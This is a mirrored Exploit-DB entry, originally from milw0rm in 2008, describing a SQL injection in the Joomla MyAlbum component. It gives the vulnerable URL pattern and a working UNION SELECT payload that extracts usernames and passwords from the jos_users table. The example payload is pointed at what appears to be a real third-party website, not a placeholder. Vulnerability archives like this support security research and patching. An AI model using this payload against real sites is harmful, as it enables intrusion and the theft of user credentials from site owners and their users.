bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5318.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
1.3 KiB
Text
Raw Blame History

-------------------------------------------------------------------------------------------------
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]
-------------------------------------------------------------------------------------------------
Example:
http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.host.sk
side note:
<name>myalbum</name>
<creationDate>01.06.2007</creationDate>
<author>Hüseyin Bora ABACI</author>
<copyright>GNU/GPL</copyright>
<authorEmail>borkurt@hotmail.com</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>1.0</version>
<description>MyAlbum is practical,comfortable,fast simple a picture gallery component.</description>
# milw0rm.com [2008-03-28]
Reference in a new issue View git blame Copy permalink